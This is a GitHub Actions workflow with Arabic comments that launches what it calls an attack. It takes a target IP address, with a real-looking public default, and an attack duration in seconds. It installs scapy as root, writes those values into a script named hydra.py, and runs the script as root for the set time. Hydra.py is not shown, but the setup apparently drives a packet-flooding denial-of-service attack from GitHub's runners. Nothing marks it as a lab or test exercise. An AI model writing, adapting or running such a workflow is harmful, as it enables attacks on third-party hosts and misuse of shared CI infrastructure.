# اسم الـ Workflow: Debug and Run Hydra (v15 - Final Syntax Fix)
name: Debug and Run Hydra (v15)

on:
  workflow_dispatch:
    inputs:
      target_ip:
        description: 'عنوان IP الهدف'
        required: true
        default: '63.246.154.12'
      duration:
        description: 'مدة الهجوم بالثواني'
        required: true
        default: '120'

jobs:
  single_attack_test:
    runs-on: ubuntu-latest
    
    steps:
      - uses: actions/checkout@v3
      - uses: actions/setup-python@v3
        with:
          python-version: 3.9

      - name: Install dependencies for ROOT
        run: |
          sudo pip3 install scapy aiodns

      - name: Prepare and Verify
        id: prepare
        run: |
          sed -i "s/TARGET_IP = .*/TARGET_IP = \"${{ github.event.inputs.target_ip }}\"/" hydra.py
          sed -i "s/DURATION = .*/DURATION = ${{ github.event.inputs.duration }}/" hydra.py
          
          TIMEOUT_MINS=$(( (${{ github.event.inputs.duration }} / 60) + 2 ))
          echo "timeout=$TIMEOUT_MINS" >> $GITHUB_OUTPUT

      - name: Launch Hydra and Monitor
        # استخدام المخرج من الخطوة السابقة لضمان الصياغة الصحيحة
        timeout-minutes: ${{ fromJson(steps.prepare.outputs.timeout) }}
        run: |
          echo "بدء تشغيل hydra.py الآن..."
          sudo python3 -u hydra.py
          echo "انتهى تشغيل hydra.py."
